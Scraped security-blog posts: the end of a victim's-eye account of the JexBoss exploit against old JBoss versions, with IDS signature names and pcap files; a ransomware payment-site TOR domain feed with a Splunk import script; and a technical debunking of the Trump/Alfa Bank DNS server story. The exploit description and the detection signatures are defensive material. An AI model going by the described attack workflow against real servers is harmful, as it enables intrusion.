Once the exploit code is deployed, a command shell is launched and a few host identification commands are automatically run.

Subsequent runs of JexBoss will not fetch the toolkit if it is already present on the victim host.

In this next example, I ran the exploit against the JBoss web-console.

Once the toolkit is resident on the JBoss instance via the JexBoss exploit, you can use the compromised host to fetch more files of your choice. Note how I used the 'curl' command to fetch a remote text file and display it on the console.

Using JexBoss to fetch a remote file via the compromised host.

In this example, I fetched the same file and saved it to the compromised host. Running the linux 'ls' command after the fetch reveals the file is now resident on the JBoss host.

Using JexBoss to fetch and save a remote file to the compromised host.

Here is a look at a log segment from the victim host after the exploits were run. A few exceptions are thrown, and Warnings and Info are logged.

Log file segment showing Warnings and Info after JexBoss exploit

Attacking JBoss v6

Attacking JBoss v6 is quite similar, except the web-console is not vulnerable, and exploiting the JMXInvokerServlet can be hit or miss.

However, the jmx-console is as easily exploited as it was in JBoss version 4.

JexBoss exploit against the jmx-console on a JBoss v6 host

JexBoss exploit against the jmx-console on a JBoss v6 host - Remote file fetch

Summary:

By virtue of this very simple exploit tool, it's quite apparent that old versions of JBoss are extremely vulnerable to full attacker control.

With the continually evolving news of organizations falling victim to ransomware via JBoss exploits, it of critical urgency that any JBoss instance be checked and patched.

I actually wonder how many organizations are even aware that they are running JBoss, let alone a vulnerable instance of it.

A breakdown of the security vulnerabilities in JBoss, the versions affected, and the pertinent dates, can be found at CVEDetails - JBoss

We wanted this post to provide a glimpse of a JBoss exploit from the vantage of the victim. We hope that this blog post helps raise further awareness to this serious threat, and provides some additional information to help detect and defend against these attacks.

Files and Additional Information:

IDS Signatures:

The following Snort and Emerging Threat IDS signatures will detect these JexBoss probes and exploits

[1:2014017:1] ET WEB_SERVER JBoss jmx-console Probe

[1:2801445:3] ETPRO EXPLOIT RedHat JBoss Enterprise Application Platform JMX Console Authentication Bypass

[1:24642:4] SERVER-WEBAPP RedHat JBoss Enterprise Application Platform JMX code execution attempt

[1:18794:9] SERVER-WEBAPP RedHat JBoss Enterprise Application Platform JMX authentication bypass attempt

[1:21516:9] SERVER-WEBAPP JBoss JMX console access attempt

[1:1054:14] SERVER-WEBAPP weblogic/tomcat .jsp view source attempt

Packet Captures

JexBoss attack traffic - Vantage of a JBoss version 6 host:

jexboss_attack_v6_victim_vantage.pcap

JexBoss attack traffic - Vantage of a JBoss version 4 host (remote toolkit fetch):

jexboss_attack_v4a_victim_vantage.pcap

JexBoss attack traffic - Vantage of a JBoss version 4 host (remote file fetch and display):

jexboss_attack_v4b_victim_vantage.pcap

JexBoss attack traffic - Vantage of a JBoss version 4 host (remote file fetch and save to victim host):

jexboss_attack_v4c_victim_vantage.pcap

↧

Threat Intel - Ransomware Payment Sites Feed

January 10, 2017, 5:09 pm

≫ Next: Analysis of Trump's secret server story

≪ Previous: JBoss exploits - View from a Victim

There are a number of great sites dedicated to Ransom ware threat feeds. Those with the most value include the Download/Dropper site or the C2 Site.

These lists of observables can help Incident Response teams, by limiting the spread throughout their local environments.

Unfortunately though, malware authors will frequently slip in under the radar, and we find individual users try to rectify the problem on their own. They will visit the payment site and pay the ransom, which keeps IT Teams in the dark. Regardless of what side of the debate you're on, hiding the ransom payment makes it hard for teams to build counter measures or even understand they have a problem.

Using a spare RaspberryPi, we've started mapping out ransom ware domains. Our project operationalizes data from Harry71, Ahmia and VisiTOR. Their excellent work in mapping TOR makes this feed possible. Finally, as we stumble upon malware samples and perform analysis, the results of that analysis is fed into the tool.

After enumerating the .onion sites, we combine the data with known Web2Tor gateways that are commonly used by malware authors, and compile a suggested notification or block list.

Because our research is largely automated, there may be occasional legitimate .onion sites on the list. We do our very best to screen and remove these quickly.

Our goal is to combine this useful data into actionable indicators of warning for IT/IR teams to use in their IDS or SIEM. Ideally you would never see these observables in your environment; but if they hit it is important to act on them immediately.

For example, here is a snippet of a feed generated on December 25, 2016:

# Ransomware Payment Sites on TOR.
# List provided with no warranty by DeepEndResearch.
# Commercial use with permission only.
# There may be false positives in this list. It should be used as an Indicator of Warning list only.
# This file is updated daily.
qli26fihoid5qwo5.onion
qli26fihoid5qwo5.anonym.to
qli26fihoid5qwo5.hiddenservice.net
qli26fihoid5qwo5.onion.cab
qli26fihoid5qwo5.onion.nu
qli26fihoid5qwo5.onion.to
qli26fihoid5qwo5.s1.tor-gateways.de
qli26fihoid5qwo5.s2.tor-gateways.de
qli26fihoid5qwo5.s3.tor-gateways.de
qli26fihoid5qwo5.s4.tor-gateways.de
qli26fihoid5qwo5.s5.tor-gateways.de
qli26fihoid5qwo5.tor2web.fi
qli26fihoid5qwo5.onion?lang=de
qli26fihoid5qwo5.anonym.to
qli26fihoid5qwo5.hiddenservice.net
qli26fihoid5qwo5.onion.cab
qli26fihoid5qwo5.onion.nu
qli26fihoid5qwo5.onion.to
qli26fihoid5qwo5.s1.tor-gateways.de
qli26fihoid5qwo5.s2.tor-gateways.de
qli26fihoid5qwo5.s3.tor-gateways.de
qli26fihoid5qwo5.s4.tor-gateways.de
qli26fihoid5qwo5.s5.tor-gateways.de
qli26fihoid5qwo5.tor2web.fi

Our feed is updated daily and posted here:

https://files.deependresearch.org/feeds/ransomware/ransomware-payment-sites.txt

We make several attempts to remove sites that are no longer operational within 24-48 hours.

One way you may try to operationalize this data, in a Splunk environment:
Convert the feed to a CSV file (set this as a daily Cron in your Splunk Search Head):

#!/usr/bin/python
import requests

if __name__ == '__main__':
ioc = []
feed_file = requests.get('https://files.deependresearch.org/feeds/ransomware/ransomware-payment-sites.txt', verify=False).content
outfile = 'domain,notes\n'
for line in feed_file.splitlines():
if line.startswith('#') or '.' not in line:
continue
outfile += '%s,DeepEndResearch Suspected Ransomware Payment Site\n' % line
with open('ransomware_payment_site.csv', 'w') as fh:
fh.write(outfile)

Then set a query using the inputlookup option at a schedule that works for your environment.

We hope that you find this feed useful. Please feel free to comment or offer us suggestions!

↧

Analysis of Trump's secret server story

March 19, 2017, 9:03 pm

≫ Next: YAFF - Yet Another Fake Flash campaign

≪ Previous: Threat Intel - Ransomware Payment Sites Feed

The debunkings will continue...

The news of Trump's server making interesting outbound connections caught attention of many security researchers in October 2016 and many of us, nerds, spent at least some time checking IP addresses, domains and looking at the logs.

However, the logs that were kindly shared by Jane Camp brought more questions than answers. For example, we see a bunch of DNS lookups for the A records of MAIL1.TRUMP-EMAIL.COM , but not much more that would support the claims of the secret communications. A number of researchers looked at it and wrote detailed explanations of why it is just a marketing email server, unlikely to be used for clandestine communications, and why the DNS log correlation with the political events seems very circumstantial. The fact that there was not enough information to make a final conclusion allowed that story to simmer until it flared up again in March, 2017 when Trump made allegations about the Trump tower wiretapping.

The reason we are raising this story from the dead again is to provide additional evidence that the "Trump's server" used to be a marketing email server. We also offer our possible explanations to some of the events and question some premises and assumptions of the original disclosure. We may repeat a lot of good points made by Krypt3ia and Errata Security in order to turn this collection of events into to a more cohesive narrative.

Disclaimer: We analyzed the email messages, the leaked logs, public DNS and IP information. We seek technical correctness and will welcome additional data. Conclusions that were made in this article were not driven by political opinions, we did not vote for Trump and do not have any interests in Alfa Bank. If you find technical or factual errors, please let us know in comments or email.

Examples of emails sent from the server in 2011-2016

The samples of email messages below show that the server was used for sending newsletter offers for at least 5 years and likely longer. We have a number of samples and mail logs of spam messages dated March 7, 2011-February 29, 2016. Please see below the email screenshots, list of subjects along with the partial string from each header, headers and screenshots of two messages.

Examples of marketing emails from March 7, 2011 to Feb 29.2016

Variety of emails received
from MAIL1.TRUMP-EMAIL.COM
2011-2016

First message sample
available date: Mar.7, 2011

Last message available dated:
Feb. 29, 2016

Raw email header of last email
avail. Feb. 29, 2016

Before we go into technical details, here is a list of points in a Q&A form.

Q: Did Trump or his associates communicate with the Russian bank via his server?

A: The messages were sent from one DNS server (Alfa Bank) to another DNS server (Cendyn) asking for the IP address of mail1.trump-email.com. The leaked logs that contain these queries do not give enough data to substantiate such claims.

Listrak Conf. Booth

Q:     Does that prove <insert anything related to Trump's claims about wiretapping, Russian computer hacking, Russian ties, etc?
A: Despite various wild theories, the events described in the original post and the logs have no relation to the Trump's claims that his wires were ~~crossed~~ tapped. This post does not prove that he "has" or "has no" other connections to Russia or anything about Russian hacking or other foreign entities. "The server " has never been the primary reason for the listed allegations.

Q: Can that server in Trump tower be possibly bugged by Obama, the British or hacked by
someone who wants to accuse the president in communications with Russia.
A:   "That server" is the same server we are talking about and it is not in the Trump tower. The server mail1.trump-email.com 66.216.133.29 was located in the Lititz, PA datacenter of a reputable digital marketing company Listrak contracted by Cendyn. Currently, the server with the IP address 66.216.133.29 is still in the datacenter and will be recycled for other needs. MAIL1.TRUMP-EMAIL.COM is pointing to a GoDaddy domain parking IP address (no actual server). TRUMP1.CONTACT-CLIENT.COM is still pointing to 66.216.133.29.

Q:   So, what happened then?
A:

Mail flow before March 2016

From at least 2011 to March, 2016, Alfa Bank employees and many other recipients around the world received so called marketing emails (aka spam) from Trump Organization sent from MAIL1.TRUMP-EMAIL.COM. Digital marketing companies Cendyn and Listrak who provided the mailing services used their mail and DNS servers in Pennsylvania and Florida. Cendyn registered that domain for the Trump Organization, which already owns over 3500 domains (src. Domaintools). None of the servers were ever physically in the Trump's Tower.

In March 2016, Trump Organization changed the vendor and stopped using Cendyn's services. Since at least May 4, 2016 (earliest date in the logs), at least some of the companies that we believe received Trump spam in the past continued to make DNS lookup requests for IP address of MAIL1.TRUMP-EMAIL.COM. Alfa Bank and Spectrum Health made many more lookups than others. Other IP addresses belong to a quarantine appliance run by an Anti-Spam cloud filtering provider MailCleaner, eCommerce Corporation mail service, Australian company called Shiftcare (software for home care services), Hostedmail.com, DNS server for small business hosting.
They did not directly connect to MAIL1.TRUMP-EMAIL.COM. In addition, it is believed many other companies were seen by various ISP providers doing similar lookups.

DNS Lookups as seen in the logs until September 23, 2016
The circle "Logs that leaked" shows the conversation content
in the logs. This does not imply that the logs were stolen from
Cendyn's ns[1-3].cdcservices.com as this is not the only
source where they could come from.
There are concerns about the source of the logs

The logs span the period from May 4, 2016 to Sept. 23 2016 and contain DNS lookup requests made by Alfa Bank's DNS servers and the companies mentioned. Some IP addresses in the logs are not actual DNS servers but gateway IP addresses for those networks.

Alfa Bank and other companies made daily (1-70+ a day) queries / DNS lookups asking for the IP address of MAIL1.TRUMP-EMAIL.COM that sent those spam emails, as seen in the email headers below.

Received: from mail1.trump-email.com ([66.216.133.29])
by <redacted> with ESMTP; 14 Jun 2013 11:19:11 -0400
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed/relaxed; s=key1; d=contact-client.com;
h=List-Unsubscribe:MIME-Version:From:To:Reply-To:Date:Subject:Content-Type:Content-Transfer-Encoding:Message-ID; i=trumphotels@contact-client.com;
...
Received: by mail1.trump-email.com id hncq6u17vn06 for <redacted@redacted.com>; Fri, 14 Jun 2013 11:19:11 -0400 (envelope-from <839CBA2F17SGIAGALHHU5NQ418SP0I4GT7UPH1TKPRC0H2NP5PDVI2JEG27M8MJ@b.contact-client.com>)
List-Unsubscribe: <mailto:IM2GHO7PREI9U5V5SNNF83BLRHTO1UL966FONR690AG1N73O80JKU740V7EQIQ4G@b.contact-client.com>

These DNS lookups for domains and IPs inside messages that are not incoming but already delivered may be caused by any of the following: misconfigurations or glitches on email and mail filtering services, security appliances performing automated or search triggered lookups (DNS lookups on existing blacklists etc.), anti-spam mailbox store rescans, and endpoint level anti-spam products.
For example, anti-spam systems are known to try to resolve and lookup every IP address and DNS name in the email message header, which can sometimes trigger unintended unsubscribe actions. For example, IETF Request for Comments RFC8058 "Signaling One-Click Functionality for List Email Headers" released in Jan. 2017 specifies rules for the broadcast marketing companies to help cope with unintended unsubscribe actions caused by anti-spam systems.

The exact reason for lookups can be only guessed, since only the companies themselves would be able to tell which of their systems caused it, assuming enough associated internal logs were saved to correlate. The reasons could be different for all companies - some of them made lookups for LINKS.TRUMP-EMAIL.COM as all URLs in the emails used that subdomain. You can see example of those links in the header examples and in these Tweetbot posts.

On September 21, Alfa bank was reached for comments about the logs, which caused the number of lookups and their variety skyrocket as their security team started the investigation.

The author of the original disclosure states that the lookup errors started on September 22, 2016 because Cendyn removed the DNS zone for mail1.trump-email.com from ns1 and ns3.cdcservices.com. These were two Cendyn DNS servers in Ft.Lauderdale, FL. The second, ns2.cdcservices.com, is located in Boca Raton, Fl. Considering that Trump was not their client since March 2016, the hasty and belated removal was either co-incidence or reaction to being notified and realizing that the zone, or domain should have been removed long ago.

Passive DNS logs show only when the subdomain is first seen, not when created or assigned. The fact that TRUMP1.CONTACT-CLIENT.COM showed up in the passive DNS logs on Sept. 30 could be attributed to testing if the server is reachable using the new (or existing) freebie domain (Cendyn creates them for each customer), especially if they indeed still used it for CRM software that "CenDyn provides to the Trump Organization".

On September 27, Alfa Bank made a DNS request for the new TRUMP1.CONTACT-CLIENT.COM. Considering, that at that time the computer security department was performing investigation of the claims, it is not surprising. The domain was likely coaxed by various lookups and queries performed by their IT department. For example, you can see sudden appearance of queries for MAIL.TRUMP-EMAIL.COM (Mail without 1) from Alfa Bank 217.12.96.15 on September 22, which can be attributed to the investigation too.

Q: Did you see Alfa Bank's statement on March 17, 2017 that they were hacked and thus those connections to the Trump's server were made by hackers to look like Alfa Bank did it. (src. Circa)

A: It is possible to send a lot of DNS traffic, or other requests and perform an attack (DDoS or other) without actually "hacking" the victim. They were not "hacked" in this particular case, in the sense of someone infiltrating their network, nor do they say that. Alfa Bank received a lot of DNS queries and DNS replies to spoofed requests after the news came out. We are sure that many of those requests are the result of various researchers trying things. 1340 DNS queries is not a large number. And no, we didn't do it.

While it is possible to spoof DNS requests and make them look like they came from Alfa Bank, it is not a convincing theory for events before September 23, 2016. From the logs provided, there were 7 other companies seen over the course of 4.5 months doing the same type of lookups.

We think the DNS spoofing attacks that happened in 2017 as reported by Alfa Bank were spurred by all the news about the mysterious DNS communications channel used by Trump and Russians. Many researchers and hackers would try all kinds of queries to elicit server responses and some possibly tried to make it look like the 'secret' communications continue. The evidence of those research efforts can be seen on the Farsight pDNS search for TRUMP-EMAIL.COM, where some recent entries include 'new' subdomains like you see below. The cause for these is the fact that TRUMP-EMAIL.COM uses a wildcard DNS record, so queries for its random subdomains will resolve successfully and show up in the database (if seen by any pDNS sensors).

last seen	2017-03-17 21:18:09 -0000
`thej35t3rpwns.trump-email.com.`	`A`	`184.168.221.46`

We should note that Cendyn transferred the TRUMP-EMAIL.COM domain to Trump Organization on March 8, 2017, thus all attempts to resolve the domain since that date would return the IP address of GoDaddy domain parking server.

Claims and Counterclaims:

Before May 2016:

Claim 1:
Trump campaign press secretary Hope Hicks: “First of all, it’s not a secret server. The email server, set up for marketing purposes and operated by a third-party, has not been used since 2010. The current traffic on the server from Alphabank’s [sic] IP address is regular DNS server traffic – not email traffic.” (Src. Guardian)

Response 1:
As you see in the last message header As you see in the last message header here, the last message was received from that server MAIL1.TRUMP-EMAIL.COM on the IP address 66.216.133.29, the last message was received from that server MAIL1.TRUMP-EMAIL.COM on 66.216.133.29 on February 29, 2016.(src. DeepEnd Research)
This tweetbot was still posting links from Trump Hotel's marketing emails in February with the last one on Feb. 29, 2016 (src. Twitter)
Cendyn acknowledged that the last marketing email it delivered for Trump's corporation was sent in March 2016" (Src. CNN)

May 2016 - September 23, 2016. Logs and log time period:

Claim 2:
Trump and Russia’s largest private bank communicated via a hidden server since at least 2016 May. (src. GDD)

Response 2: Not hidden and did not communicate intentionally

As it was already pointed out by many, the sever is located in a server farm that belongs to a hosting company and is one of many used by Cendyn (the company used by Trump Organization for mailing services). It is not more hidden than any server of any cloud services provider.
Subdomains of
CONTACT-CLIENT.COM
You can see other servers with similar domain names registered by Cendyn in this 66.216.133.0/24 range (src. Hurricane Electric) and check out the domain siblings (Sibling domains are subdomains that share a common suffix which is not a public suffix. ) (src. Virustotal pDNS).

A long list of subdomains of CONTACT-CLIENT.COM shows other clients on Cendyn with similar domains. (see Virustotal pDNS Contact-client.com subdomains)
"The RData for this host were served by the Central Dynamics (CC-801) authority resolvers ns{1,2,3}.cdcservices.com."(src. GDD) < Central Dynamics (Cendyn) maintained DNS records for the domain just like they do for other customers and other domains they registered and maintained for Trump were:

TRUMP1.CONTACT-CLIENT.COM 66.216.133.29 (Cendyn's range)
TRUMP.MLINKS.CONTACT-CLIENT.COM 168.235.224.14 (Cendyn's range)
TRUMP.TRANSACTIONAL.CONTACT-CLIENT.COM 64.135.26.234 (Cendyn's range)
TRUMP.MARKETING.CONTACT-CLIENT.COM 64.135.26.234 (Cendyn's range)

MAIL1.TRUMP-EMAIL.COM 66.216.133.29 (now is on 184.168.221.46 - GoDaddy dn parking)
LINKS.TRUMP-EMAIL.COM CNAME customers.listrak.com (now is on 184.168.221.46 - GoDaddy domain parking)

Claim 3:
"Trump’s host mail1.trump-email.com operated a Listrak virtual mail transfer agent outside the SPF sending range, configured for outbound delivery. "(src. GDD and Slate)

"The scientists theorized that the Trump and Alfa Bank servers had a secretive relationship after testing the behavior of mail1.trump-email.com using sites like Pingability. When they attempted to ping the site, they received the message “521 lvpmta14.lstrk.net does not accept mail from you.” (src. LJean.com)

Response 3:

Robert Graham from Errata Security already explained that this is how Listrak configures email marketing servers. (src. Errata Security).

As for "outside of SPF range", Cendyn's SPF records for TRUMP-EMAIL.COM and CONTACT-CLIENT.COM (envelope sender) included MX, which is the same for all their domains - incoming.cdcservices.com . MX entry in SPF records makes it unnecessary to list all the IPs. The only downside and limitation about using MX entry instead of IPs is that it works only for servers that only do sending, not receiving - which is what that server was built to do. See the header here and note that Received-SPF: pass

SPF records for TRUMP-EMAIL.COM: first seen2014-11-14 11:17:46 -0000last seen2016-09-23 12:59:33 -0000trump-email.com.TXT"Internet Solution from Cendyn.com."
trump-email.com.TXT"v=spf1 ip4:198.91.42.0/23 ip4:64.135.26.0/24 ip4:64.95.241.0/24 ip4:206.191.130.0/24 ip4:63.251.151.0/24 ip4:69.25.15.0/24 mx ~all"
SPF check from email header:Received-SPF: pass (google.com: domain of H46ERELB4L1O917PENAM0QLOBKO2PO7OTETRAA30GQDB7GOSSGRVKCR5AKPE3C9@b.contact-client.com designates 66.216.133.29 as permitted sender) client-ip=66.216.133.29;

Claim 4:
"Since May of 2016 only two networks resolved the mail1.trump-email.com host, AS15632 (JSC Alfa-Bank) and AS30710 (Spectrum Health). Alfa Bank is Russia’s largest bank and Spectrum Health is a integrated, managed care health care organization in Michigan."(src. GDD)

Response 4:

The logs show more than two companies (src. LJean.com)

Other companies that are not shown in the logs also made such queries (src. Twitter - via Errata Security)

Robert Graham has covered that topic. (src. Errata Security)

Claim 5:
Spikes in the communications correlate with the political events in the Summer of 2016 .(src. GDD)

Response 5:

Some spikes correlate and others don't.

Robert Graham has covered that topic. (src. Errata Security)

Claim 6:

"Strange combined domain name (mail.trump-email.com.moscow.alfaintra.net) seen in Alfa Bank logs mean "Moscow division of the INTERNAL Alfa Bank network most definitely has purposeful communications with a hostname registered by the Trump Organization. "(src. LJean.com)

Response 6:

It is normal Windows behavior. Look for Primary DNS and DNS suffix topics. Robert Graham already covered it. (src. Errata Security)

Claim 7:

Cendyn headquarters

IP address 66.216.133.29 doesn't appear on spam blocklists thus unlikely to be a spam server (src. LJean.com)

Response 7:

Cendyn is a marketing company, they do their best to avoid being blacklisted as it would undermine their business.

Robert Graham already covered it. (src. Errata Security)

Claim 8:
CenDyn stated the reason they recreated a trump1.contact-client.com hostname pointing to this same IP address was for the Trump Organization to use the CRM software CenDyn provides to the Trump Organization." (src. LJean.com)

Response 8:

It is possible they needed to use TRUMP1.CONTACT-CLIENT.COM after they removed EMAIL1.TRUMP-EMAIL.COM We do not know when it happened. We know when TRUMP1.CONTACT-CLIENT.COM showed up in the DNS logs and passive DNS database, but it is not a direct evidence of the creation and assignment date.

Claim 9:
"CenDyn states that their servers are not dedicated to a specific client. Yet the Internet-Wide Scan Data Repository (scans.io) data show that the hostname mail1.Trump-Email.com has been stable since at least 2013. It did not change for three years, then did change on on 23 September 2016. At the time of this writing, 2 October 2016, no other hostname has pointed to this IP 66.216.133.29:just trump1.contact-client.com and mail1.trump-email.com. So this IP address is associated with only that server. " (src. LJean.com)

Response 9:

This is correct. It appears that 66.216.133.29 was dedicated to Trump Organization. PTR records are still not updated.

first seen2010-07-02 19:20:22 -0000
last seen2016-09-13 01:47:56 -0000
mail1.trump-email.com.A66.216.133.29

first seen2017-03-08 04:32:26 -0000
last seen2017-03-19 17:41:34 -0000
mail1.trump-email.com.A184.168.221.46 < now

Reverse DNS

Rdata results for ANY/ 66.216.133.29
mail1.trump-email.com.A66.216.133.29
trump1.contact-client.com.A66.216.133.29

Claim 10:
DNS was possibly used to conceal data and commands within DNS traffic using the technique called DNS tunneling (as many ask on Twitter)

Response 10:

It does not seem to be the case, if based on the provided logs. They show "A" records only. "A" records are used for transferring only IP addresses. DNS tunneling would be possible if those were "TXT" or "CNAME" type records that can hold arbitrary non-formatted text strings. (Tunneling Data and Commands Over DNS to Bypass Firewalls by Lenny Zeltser)

September 21, 2016 - October 5, 2016 As requests for comments were sent to Alfa Bank

Claim 11:"When a reporter called Alfa Bank for comment on September 21, the zone for mail1.trump-email.com was removed from ns1 and ns3.cdcservices.com causing RCODE=2 (Server Failure), and ns2 returned empty referrals"(src. GDD)
"One of the intriguing facts in my original piece was that the Trump server was shut down on Sept. 23, two days after the New York Times made inquiries to Alfa Bank (and a week before the Times reached out to Trump)." (src. Slate)

Trump, CenDyn or some other party associated with the domain sought to erase the mail1.Trump-Emal.com host by deleting forward resolution zones. So the domain name was removed from the normal way one would look up a domain. However, the reverse delegation still exists as of 2 November 2016." (src. LJean.com)

Response 11:

The server as machine on 66.216.133.29 in the Listrak datacenter is still up so it was not shut down.
Passive DNS shows that "A" record MAIL1.TRUMP-EMAIL.COM was last seen on 66.216.133.29 on 2016-09-13. Since Trump company 'ditched' Cendyn in March 2016, eventual cleanup of DNS records had to happen - eventually. We don't know if they were contacted regarding the matter on or before September 22, 2016. If they were, it would be a normal knee-jerk reaction to the inquiry.
They removed records only from the Ft. Lauderdale servers (NS1 and NS3) but not NS2 in Boca Raton (different admins?). It was noted by many that they also forgot to remove PTR record for mail1.trump-email.com and it is still pointing to 66.216.133.29 even though A record was finally assigned to GoDaddy domain parking 184.168.221.22 on March 8, 2017 (after transferring domain back to Trump org).

Claim 12: "Alfa Bank knew that Trump renamed his host through ongoing email delivery and HELO/EHLO resolutions, or another channel. Trump and Alfa Bank have since coordinated their move to an office communications channel." (src. GDD)

Response 12:

Not sure what the author means by "an office communications channel". The requests for comments for the Alfa Bank were made on September 21, 2016. On September 27, 2016 the Alfa bank DNS server made a lookup for TRUMP1.CONTACT-CLIENT.COM. Considering that they did their investigation of the claims, it is not unexpected that their security people finally found and queried the other domain associated with the IP.

Claim 13: "The hostname trump1.contact-client.com appeared in the first passive DNS

Over 500 subdomains.
via PassiveTotal pDNS
database three days later, and still has not appeared in some passive collections." (src. GDD)

Response 13:

Passive DNS collections are passive. They see a lot but not every successful resolution on the web. (see more at PassiveTotal FAQ or Farsight pDNS FAQ )

October 5, 2016 - March 8, 2017 Post-Disclosure

Claim 14:
In March 2016, Cendyn said it "transferred back to" Trump's company the mail1.trump-email.com domain. (Src. CNN)

Response 14:

Yes, they did transfer the domain control on 2017-03-08. Since then, MAIL1.TRUMP-EMAIL.COM and all subdomains resolve to 184.168.221.46 - GoDaddy Parking (IP address for domains without associated hosting servers)

Claim 15:
Alfa Bank claims that the recent attacks in February and March 2017 are intended to make it look they continue the secret communications with the Trump server.

Response 15:

2017-02-17 According to the Alfa Bank press release on 2017-03-17, on 2017-02-17 computers in USA sent requests to "Trump Organization server" and made it look like it came "from various variants of MOSCow.ALFAintRa.nET", thus the "Trump's server's" replies were sent to Alfa bank.(src. Alfa Bank and Circa).

The press releases often go through several layers of editing which could affect the technical accuracy of the text. For example, here we can assume that by the Trump Organization server they mean Cendyn's DNS server for MAIL1.TRUMP-EMAIL.COM and that server received DNS queries for MAIL1.TRUMP-EMAIL.COM that came from Alfa Bank spoofed IP addresses. DNS servers do not record domain names of incoming requestors, so it is not entirely clear where they saw MOSCow.ALFAintRa.nET. Not questioning the fact of the attack but it is hard to say what happened without actual logs or more technical data.

2017-03-11 and 2017-03-13 According to the Alfa Bank press release on 2017-03-17, on 2017-03-11 and 2017-03-13 their systems received 1340 DNS replies to the queries they did not send for mail.trump-email.com.moscow.alfaintra.net.(src. Alfa Bank and Circa)

Again, it looks like press release is lacking technical accuracy, which is ok.
In general, sending DNS request from spoofed IP addresses (crafted packets) is very easy. Often attackers use nonexistent subdomains to force their recursive DNS server to forward each of their queries to the authoritative DNS server for that domain instead of using cached answers, thus overloading it. DDoS does not seem to be the goal but more like malicious experimenting.

Claim 16:

But experts claim it is <unusual, odd.. etc>

Response 16:

In tech speak, epithets like "odd", "weird", "not normal" do not really mean clandestine or paranormal. These are highly technical terms meant to convey that existing evidence is too limited to allow one extrapolate the possible scenarios. I am not speaking for every comment out there but am suggesting not to jump to conclusions when a nerd calls something "odd".
Robert Graham comments on the experts' claims too (src. Errata Security)

Timeline of events 2007 - 2017

It would be beneficial, I think, to establish a timeline of the events that you see below and we will go over the milestones below.

Timeline of events February 2016 - March 2017

References for the timeline

2007-06-21 Cendyn is chosen as a marketing vendor for Trump Hotels (src. Prnewswire)
2009-08-14 TRUMP-EMAIL.COM registered by sl.admin@cendyn.com (src. Domaintools.com)
2010 Last time, according to Hope Hicks (White House) when MAIL1.TRUMP-EMAIL.COM on 66.216.133.29 was used by Trump (src. The Guardian)
2011-03-07 Email header of a message sent on March 7, 2011 (Src. DeepEnd Res)
2016-March Last time the server was used to send emails, according to Cendyn (src. CNN)
2016-05-04 First time stamp in the leaked logs
2016-07 Tea Leaves researches logs and shares data with computer experts
2016-09-13 Last time MAIL1.TRUMP-EMAIL.COM A record was seen by pDNS on 66.216.133.29
2016-09-23 Last timestamp in the leaked logs
2016-09-21 Alfa Bank were contacted for comments
2016-09-22 DNS Errors on trump-email.com
2016-09-23 DNS Errors on trump-email.com
2016-09-23 Alfa Bank 217.12.97.15 and 217.12.97.137 make DNS A record queries for MAIL.TRUMP-EMAIL.COM (mail without 1) that is on 198.91.42.236 (src. leaked logs)
2016-09-23 Three CNAME and A queries for (pseudo?)random subdomain of trump-email.com get registered by pDNS
2016-09-27 Alfa Bank 217.12.97.15 makes a DNS A record query for TRUMP1.CONTACT-CLIENT.COM
2016-09-30 TRUMP1.CONTACT-CLIENT.COM first seen by Farsight pDNS on 66.216.133.29
2016-10-03 TRUMP1.CONTACT-CLIENT.COM first seen by Virustotal pDNS on 66.216.133.29
2016-10-03 TRUMP1.CONTACT-CLIENT.COM first seen by PassiveTotal pDNS on 66.216.133.29
2016-10-05 GDD53 publishes the original article Trump’s Russian Bank Account
2017-02-17 According to the Alfa Bank press release on 2017-03-17, computers in USA sent requests to "Trump Organization server" and made it look like it came "from MOSCow.ALFAintRa.nET", thus the "Trump's server's" replies were sent to Alfa bank.(src. Alfa Bank and Circle)
2017-03-08 TRUMP-EMAIL.COM was transferred by Cendyn to "Registrant Organization: Trump Orgainzation Registrant Street: 725 Fifth Avenue Registrant City: New York"
2017-03-04 - 29.133.216.66.in-addr.arpa. PTR for MAIL1.TRUMP-EMAIL.COM last seen on 66.216.133.2 (via dig -x)
2017-03-11 and 2017-03-13 According to the Alfa Bank press release on 2017-03-17, their systems received 1340 DNS replies to the queries they did not send for mail.trump-email.com.moscow.alfaintra.net.(src. Alfa Bank and Circle)

Previous Reports and Research

2016-10-05 Tea Leaves GDD53 Trump’s Russian Bank Account
2016-10 DNS logs Jean Camp Transparent Network data
2016-10-05 Krypt3ia GDD53: A Russian Hosted i2p Site That Claims Trump’s Email System Had Ties To Alfabank (Russia)
2016-10-31 Slate Was a Trump Server Communicating With Russia?
2016-11-01 Krypt3ia Shits Gone Plaid: GDD53 and Slate
2016-11-01 Errata Security Debunking Trump's "secret server"
2016-11-03 Errata Security In which I have to debunk a second time
2016-11-01 Washington Post That secret Trump-Russia email server link is likely neither secret nor a Trump-Russia link
2016-11-01 The Intercept Here is a problem with the story connecting Russia to Donald Trump's Email
2016-11-02 Slate. Trump’s Server, Revisited
2017-03-10 CNN Sources: FBI investigation continues into 'odd' computer link between Russian bank and Trump Organization
2017-03 Snopes (Unproven) Trump Organization Computer Server Tied to Russian Bank?
2017-03-17 Alfa Bank. Заявление для прессы
2017-03-17 Circa. Russian bank tells DOJ mysterious Trump computer connections may have been hacker hoax

-->https://www.dnsdb.info/#Search_rrset_ANY_*.trump-email.com.courtesy of Farsight Security pDNS

bailiwick	com.
count	2498
first seen in zone file	2010-04-24 16:12:21 -0000
last seen in zone file	2017-03-07 17:02:37 -0000
`trump-email.com.`	`NS`	`ns1.cdcservices.com.`
`trump-email.com.`	`NS`	`ns2.cdcservices.com.`
`trump-email.com.`	`NS`	`ns3.cdcservices.com.`

bailiwick	com.
count	9
first seen in zone file	2017-03-08 17:02:36 -0000
last seen in zone file	2017-03-16 16:02:32 -0000
`trump-email.com.`	`NS`	`ns33.domaincontrol.com.`
`trump-email.com.`	`NS`	`ns34.domaincontrol.com.`

bailiwick	trump-email.com.
count	69
first seen	2017-03-08 02:52:17 -0000
last seen	2017-03-17 21:39:58 -0000
`trump-email.com.`	`A`	`184.168.221.46`

bailiwick	com.
count	84316
first seen	2010-07-02 19:20:21 -0000
last seen	2017-03-08 01:43:28 -0000
`trump-email.com.`	`NS`	`ns1.cdcservices.com.`
`trump-email.com.`	`NS`	`ns2.cdcservices.com.`
`trump-email.com.`	`NS`	`ns3.cdcservices.com.`

bailiwick	com.
count	292
first seen	2017-03-08 02:52:17 -0000
last seen	2017-03-17 14:31:14 -0000
`trump-email.com.`	`NS`	`ns33.domaincontrol.com.`
`trump-email.com.`	`NS`	`ns34.domaincontrol.com.`

bailiwick	trump-email.com.
